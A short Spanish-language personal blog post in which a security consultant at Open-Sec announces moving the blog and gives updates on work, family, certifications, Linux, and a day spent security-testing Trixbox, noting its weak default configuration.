Ya en el 2004 abri un blog aqui, asi que me estoy mudando.
No creo que "arrastre" todos los posts anteriores, como en cualquier mudanza, algunas cosas se echan a la basura.
Para iniciar este blog con algo mas que contar la mudanza, hare el consabido update ya que no publico tampoco en el otro hace tiempo :
1. Trabajo : Open-Sec es una empresa que ya despego y aunque seguimos sin tener vendedores, por lo menos, estamos en el punto en que nos llaman como empresa.
La gente de Open-Sec no es muy joven, de hecho, todos pasamos los 30 años y tenemos metas personales y profesionales bien particulares.
2. Familia : Creo que nunca terminará de crecer el orgullo que siento por mis hijos, siguen siendo los mejores. Tampoco puedo dejar de sentir orgullo por mi esposa y por mi que por lo menos hemos madurado en una relación donde sabemos que seguiremos juntos para siempre.
3. Profesional : Me siento contento de hacer lo que me gusta y que eso me este dando dinero, no hay mas que decir.
4. Seguridad : Seguimos en el camino de la seguridad informática. Mi vida es 90% de ethical hacking y 10% de análisis forense basado en la demanda del mercado. Este año voy por la certificación CHFI y mis compañeros en Open-Sec van por las de CEH (Gustavo), Network Security (Martha), CISM (Gustavo, el único bicho raro interesado en seguridad de la información).
5. Linux : Sigue siendo apasionante, pero, ya deje totalmente de lado el aspecto político-religioso. Es más, ni si quiera tengo metas personales respecto a certificaciones de Linux. En Open-Sec solamente Renzo sacarás las de SuSE por necesidad laboral. Igual, le duela a quien le duela y que haga feliz a la mitad del mundo más 1 : SuSE rulez!!!
6. Que hago hoy ? Me pase este día haciendo pruebas de seguridad a Trixbox. No digo hacking porque sería decir que estoy creandole o modificandole cosas. Motivo : hay un webo de gente newbie instalando Trixbox por todos lados, pronto verán los problemas de seguridad que tienen soluciones tan llave en mano como esta. Ojo: funciona muy bien, esta casi todo hecho, casi todo por default funciona perfecto, no hay que meter mucha información. Aja! muchos valores default y un sistema operativo sin hardening, terreno perfecto para los atacantes.
Hasta la próxima....